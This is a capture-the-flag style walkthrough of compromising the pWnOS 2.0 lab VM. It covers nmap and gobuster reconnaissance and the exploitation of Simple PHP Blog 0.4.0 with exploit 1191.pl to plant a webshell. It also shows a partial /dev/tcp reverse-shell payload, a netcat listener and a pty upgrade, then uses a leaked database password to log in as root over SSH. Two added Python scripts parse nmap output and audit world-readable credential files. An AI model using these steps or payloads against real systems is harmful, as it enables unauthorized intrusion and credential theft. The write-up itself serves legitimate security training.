pWnOS2
2023-04-08 16:25:26
Source: 博客园 (cnblogs)
pWnOS2.0
1. Host discovery

```
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sn 10.10.10.0/24
[sudo] de1te 的密码:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:00 CST
Nmap scan report for 10.10.10.1
Host is up (0.00055s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.15
Host is up (0.000050s latency).
MAC Address: 00:50:56:FD:40:27 (VMware)
Nmap scan report for 10.10.10.100
Host is up (0.00010s latency).
MAC Address: 00:0C:29:5F:8B:AA (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:ED:BE:4A (VMware)
Nmap scan report for 10.10.10.90
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.82 seconds
```

- Target address: 10.10.10.100
2. Port scanning

Open port scan

```
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap --min-rate 10000 -p- 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:03 CST
Nmap scan report for 10.10.10.100
Host is up (0.00010s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:5F:8B:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 1.88 seconds
```

- Open ports: 22, 80
Service and version scan of the open ports

```
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sT -sV -O -p22,80 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:04 CST
Nmap scan report for 10.10.10.100
Host is up (0.00049s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:5F:8B:AA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.32 - 2.6.39
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds
```

- As a rule, run the scan twice so that a transient network problem does not skew the result.
UDP scan

```
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -sU -p22,80 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:06 CST
Nmap scan report for 10.10.10.100
Host is up (0.00024s latency).
PORT   STATE  SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:5F:8B:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds
```

Common vulnerability scan

```
┌──(de1te㉿de1te)-[~]
└─$ sudo nmap -script=vuln -p22,80 10.10.10.100
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:07 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.10.100
Host is up (0.00031s latency).
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
| http-enum:
|   /blog/: Blog
|   /login.php: Possible admin folder
|   /login/: Login page
|   /info.php: Possible information file
|   /icons/: Potentially interesting folder w/ directory listing
|   /includes/: Potentially interesting directory w/ listing on "apache/2.2.17 (ubuntu)"
|   /index/: Potentially interesting folder
|   /info/: Potentially interesting folder
|_  /register/: Potentially interesting folder
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.100
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.100:80/register.php
|     Form id:
|     Form action: register.php
|
|     Path: http://10.10.10.100:80/login.php
|     Form id:
|_    Form action: login.php
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       httponly flag not set
|   /login.php:
|     PHPSESSID:
|       httponly flag not set
|   /login/:
|     PHPSESSID:
|       httponly flag not set
|   /index/:
|     PHPSESSID:
|       httponly flag not set
|   /register/:
|     PHPSESSID:
|_      httponly flag not set
MAC Address: 00:0C:29:5F:8B:AA (VMware)
Nmap done: 1 IP address (1 host up) scanned in 55.66 seconds
```

Summary: ports 22 and 80 are open, so we can start from port 80. The server's kernel version is old.
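Scan output like the above is easier to track across several scans when it is turned into structured records. The following is an added example, not code from the original write-up: a small Python parser for nmap's normal (human-readable) output that extracts hosts, ports, states, service versions and the OS guess. The sample output embedded in it is re-typed from the service scan above; the function and class names are my own.

```python
import re
from dataclasses import dataclass, field

# Sample input: the service scan from the write-up above, re-typed with its
# line breaks restored. Any "nmap -sV -O" normal output has the same shape.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-07 10:04 CST
Nmap scan report for 10.10.10.100
Host is up (0.00049s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
MAC Address: 00:0C:29:5F:8B:AA (VMware)
OS details: Linux 2.6.32 - 2.6.39
Nmap done: 1 IP address (1 host up) scanned in 8.66 seconds
"""


@dataclass
class PortRecord:
    port: int
    proto: str
    state: str
    service: str
    version: str  # empty when nmap printed no version column


@dataclass
class HostRecord:
    address: str
    ports: list = field(default_factory=list)
    os_details: str = ""


# One host block starts at "Nmap scan report for ..."; port lines look like
# "22/tcp open ssh <optional version text>"; the OS guess is a single line.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")
OS_RE = re.compile(r"^OS details: (.*)$")


def parse_nmap_normal(text):
    """Parse nmap normal output into a list of HostRecord objects."""
    hosts = []
    current = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostRecord(address=m.group(1))
            hosts.append(current)
            continue
        if current is None:
            continue  # banner lines before the first host block
        m = PORT_RE.match(line)
        if m:
            current.ports.append(PortRecord(
                port=int(m.group(1)),
                proto=m.group(2),
                state=m.group(3),
                service=m.group(4),
                version=(m.group(5) or "").strip(),
            ))
            continue
        m = OS_RE.match(line)
        if m:
            current.os_details = m.group(1)
    return hosts


def open_ports(host):
    """Port numbers reported as open for one host, in scan order."""
    return [p.port for p in host.ports if p.state == "open"]


def summarize(hosts):
    """One line per open port: address, port/proto, service and version."""
    lines = []
    for h in hosts:
        for p in h.ports:
            if p.state == "open":
                lines.append(f"{h.address} {p.port}/{p.proto} {p.service} {p.version}".rstrip())
    return lines


if __name__ == "__main__":
    for line in summarize(parse_nmap_normal(SAMPLE_NMAP_OUTPUT)):
        print(line)
```

Feeding the output of the second scan the write-up recommends into the same parser and comparing the two `summarize()` lists is a quick way to spot a port that appeared or disappeared between runs because of a network hiccup.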
3. Web exploitation

Directory brute-forcing

```
┌──(de1te㉿de1te)-[~]
└─$ sudo gobuster dir -u http://10.10.10.100 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.100
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/04/07 10:24:38 Starting gobuster in directory enumeration mode
===============================================================
/includes             (Status: 301) [Size: 315] [--> http://10.10.10.100/includes/]
/register             (Status: 200) [Size: 1562]
/login                (Status: 200) [Size: 1174]
/blog                 (Status: 301) [Size: 311] [--> http://10.10.10.100/blog/]
/info                 (Status: 200) [Size: 49871]
/index                (Status: 200) [Size: 854]
/activate             (Status: 302) [Size: 0] [--> http://10.10.10.100/index.php]
/server-status        (Status: 403) [Size: 293]
Progress: 21892 / 62285 (35.15%)
[ERROR] 2023/04/07 10:24:42 [!] parse "http://10.10.10.100/error\x1f_log": net/url: invalid control character in URL
/index                (Status: 200) [Size: 854]
Progress: 61574 / 62285 (98.86%)
===============================================================
2023/04/07 10:24:48 Finished
===============================================================
```

Browsing the site

Port 80

There is a login page, but manual injection attempts did not work.

http://10.10.10.100/includes/ contains a config file, but when we download it, it is empty.

http://10.10.10.100/blog/index.php

- The page says it is Simple PHP Blog 0.4.0
- A quick search shows it is a simple blog system. Let's see whether it has any known vulnerabilities.

```
┌──(de1te㉿de1te)-[~]
└─$ searchsploit simple php blog
----------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                     |  Path
----------------------------------------------------------------------------------- ---------------------------------
Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection                           | php/webapps/30317.txt
Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting                                | php/webapps/30318.txt
Insanely Simple Blog 0.5 - SQL Injection                                           | php/webapps/5774.txt
Simple Blog PHP 2.0 - Multiple Vulnerabilities                                     | php/webapps/40518.txt
Simple Blog PHP 2.0 - SQL Injection                                                | php/webapps/40519.txt
Simple PHP Blog (SPHPBlog) 0.5.1 - Code Execution                                  | php/webapps/6311.php
Simple PHP Blog (sPHPblog) 0.5.1 - Multiple Vulnerabilities                        | php/webapps/4557.txt
Simple PHP Blog 0.4 - 'colors.php' Multiple Cross-Site Scripting Vulnerabilities   | cgi/webapps/26463.txt
Simple PHP Blog 0.4 - 'preview_cgi.php' Multiple Cross-Site Scripting Vulnerabilit | cgi/webapps/26461.txt
Simple PHP Blog 0.4 - 'preview_static_cgi.php' Multiple Cross-Site Scripting Vulne | cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 - Multiple Remote s                                          | php/webapps/1191.pl
Simple PHP Blog 0.4.0 - Remote Command Execution (Metasploit)                      | php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 - Remote Command Execution                                 | php/webapps/1581.pl
Simple PHP Blog 0.5.1 - Local File Inclusion                                       | php/webapps/10604.pl
Simple PHP Blog 0.5.x - 'search.php' Cross-Site Scripting                          | php/webapps/33507.txt
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)                     | php/webapps/40475.txt
SimpleBlog 2.0 - 'comments.asp' SQL Injection (2)                                  | php/webapps/2232.pl
SimpleBlog 3.0 - Database Disclosure                                               | php/webapps/7232.txt
Super Simple Blog Script 2.5.4 - 'entry' SQL Injection                             | php/webapps/9180.txt
Super Simple Blog Script 2.5.4 - Local File Inclusion                              | php/webapps/9179.txt
----------------------------------------------------------------------------------- ---------------------------------
```

- It does have vulnerabilities.

```
searchsploit -m 1191
```

- Download the file 1191.pl

Usage instructions

- There seem to be plenty of things here that can be exploited.
Method 1:

```
perl 1191.pl -h http://10.10.10.100/blog -e 1
```

The uploaded cmd file is just a simple one-line webshell.

Method 2:

```
perl 1191.pl -h http://10.10.10.100/blog/ -e 3 -U 123 -P 123
```

This logs into the admin backend successfully.

There is a place to upload a photo; let's see whether other file types can be uploaded.

```
& /dev/tcp/10.10.10.90/443 0>&1'") ?>
```

The upload succeeded.

Summary: both methods work; in the end the approach is to upload the file into the images folder.
4. Privilege escalation

We just uploaded our reverse shell through the Simple PHP Blog vulnerability.

```
sudo nc -lvnp 443   # listen on port 443
www-data@web:/var/www/blog/images$ whoami
whoami
www-data
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
sudo: no tty present and no askpass program specified
```

There is no tty. Check whether python is installed.

```
dpkg -l
python -c "import pty;pty.spawn('/bin/bash')"
www-data@web:/var/www/blog/images$ sudo -l
sudo -l
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data: da
Sorry, try again.
[sudo] password for www-data: da
Sorry, try again.
sudo: 3 incorrect password attempts
```

- We do not know the password.

Everything is ready now, so we start on privilege escalation. Hmm, let's look for leaked sensitive files first.

```
www-data@web:/var/www/blog$ cd ..
cd ..
www-data@web:/var/www$ ls
ls
activate.php  includes   info.php   mysqli_connect.php
blog          index.php  login.php  register.php
www-data@web:/var/www$ cat mysqli_connect.php
cat mysqli_connect.php
```

username: root, password: goodday

Let's try it.

```
www-data@web:/var/www$ mysql -u root -p
mysql -u root -p
Enter password: goodday
ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES)
```

The password is wrong?!!!

But the web service is still running, so the real configuration file must exist somewhere.

```
www-data@web:/var/www$ cd ..
cd ..
www-data@web:/var$ ls
ls
backups  crash       lib    lock  mail                opt  spool  uploads
cache    index.html  local  log   mysqli_connect.php  run  tmp    www
www-data@web:/var$ cat mysqli_connect.php
cat mysqli_connect.php
```

- Sure enough!!!
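The finding above is a classic one: a copy of the database configuration sits outside the web root but is still world-readable, so the low-privilege service account can open it. The following is an added example, not code from the write-up or from the VM: a small Python audit that walks a directory tree, flags world-readable regular files whose contents look like credential assignments, and records whether each one lies inside the served web root. It reports the key names it matched, never the values. The fixture it builds in a temporary directory is constructed to mirror the layout found above (the contents of the copy under /var are a placeholder, since the page does not show them), and all function names are my own.

```python
import os
import re
import stat
import tempfile

# Heuristic for credential assignments in PHP/INI/YAML-style files, e.g.
#   define('DB_PASSWORD', 'x');   $password = "x";   password: x
# Only the key name is captured as a named group; the value group is never reported.
CRED_RE = re.compile(
    r"""(?i)\b(?P<key>db_pass(?:word)?|password|passwd)\b['"]?\s*(?:=>|=|:|,)\s*['"]?([^'"\s;,)]+)"""
)


def find_credential_keys(text):
    """Names of credential-looking keys found in text (values are discarded)."""
    return [m.group("key") for m in CRED_RE.finditer(text)]


def audit_readable_secrets(base_dir, web_root):
    """World-readable regular files under base_dir that contain credential assignments."""
    web_root_abs = os.path.abspath(web_root)
    findings = []
    for dirpath, _dirnames, filenames in os.walk(base_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue  # skip symlinks, sockets, etc.
            if not st.st_mode & stat.S_IROTH:
                continue  # not world-readable: a service account outside the owning group cannot open it
            try:
                with open(path, "r", errors="replace") as fh:
                    text = fh.read(65536)  # config files are small; cap the read for large files
            except OSError:
                continue
            keys = find_credential_keys(text)
            if not keys:
                continue
            path_abs = os.path.abspath(path)
            inside = os.path.commonpath([path_abs, web_root_abs]) == web_root_abs
            findings.append({
                "path": os.path.relpath(path, base_dir),
                "keys": keys,
                "inside_web_root": inside,  # inside: the file may also be served; outside: still readable locally
            })
    return sorted(findings, key=lambda f: f["path"])


def build_fixture(base):
    """Constructed sample tree mirroring the layout found on the target; returns the web root."""
    www = os.path.join(base, "var", "www")
    os.makedirs(www)
    # Decoy config inside the web root, with the credentials quoted in the write-up.
    decoy = os.path.join(www, "mysqli_connect.php")
    with open(decoy, "w") as fh:
        fh.write("<?php\nDEFINE('DB_USER', 'root');\nDEFINE('DB_PASSWORD', 'goodday');\n")
    os.chmod(decoy, 0o644)
    # Copy outside the web root; its real contents are not shown on the page, so use a placeholder.
    real = os.path.join(base, "var", "mysqli_connect.php")
    with open(real, "w") as fh:
        fh.write("<?php\nDEFINE('DB_USER', 'root');\nDEFINE('DB_PASSWORD', 'REDACTED-PLACEHOLDER');\n")
    os.chmod(real, 0o644)
    # Correctly locked-down file: contains a password but is not world-readable, so it is not flagged.
    private = os.path.join(base, "etc", "app.conf")
    os.makedirs(os.path.dirname(private))
    with open(private, "w") as fh:
        fh.write("password = s3cret\n")
    os.chmod(private, 0o600)
    return www


def demo():
    """Build the fixture in a temp dir and return the audit findings."""
    with tempfile.TemporaryDirectory() as base:
        web_root = build_fixture(base)
        return audit_readable_secrets(base, web_root)


if __name__ == "__main__":
    for f in demo():
        where = "INSIDE web root" if f["inside_web_root"] else "outside web root"
        print(f"{f['path']}: keys={f['keys']} ({where})")
```

Run against a real host as `audit_readable_secrets("/var", "/var/www")`, the two matches this fixture produces are exactly the two files the write-up found; the 0600 file under etc/ shows the fix, which is to make such copies unreadable to the web server's account rather than to rely on them being outside the document root.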
Connect over ssh

```
┌──(de1te㉿de1te)-[~]
└─$ sudo ssh root@10.10.10.100
root@10.10.10.100's password:
Welcome to Ubuntu 11.04 (GNU/Linux 2.6.38-8-server x86_64)

 * Documentation:  http://www.ubuntu.com/server/doc

  System information as of Fri Apr  7 02:15:10 EDT 2023

  System load:  0.0               Processes:           82
  Usage of /:   2.9% of 38.64GB   Users logged in:     0
  Memory usage: 26%               IP address for eth0: 10.10.10.100
  Swap usage:   0%

  Graph this data and manage this system at https://landscape.canonical.com/
Last login: Mon May  9 19:29:03 2011
root@web:~#
```

Final screenshot:

```
root@web:~# whoami
root
root@web:~# ip a
1: lo: mtu 16436 qdisc noqueue state UNKNOWN
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:5f:8b:aa brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.100/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:fe5f:8baa/64 scope link
       valid_lft forever preferred_lft forever
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# sudo -l
Matching Defaults entries for root on this host:
    env_reset

User root may run the following commands on this host:
    (ALL : ALL) ALL
```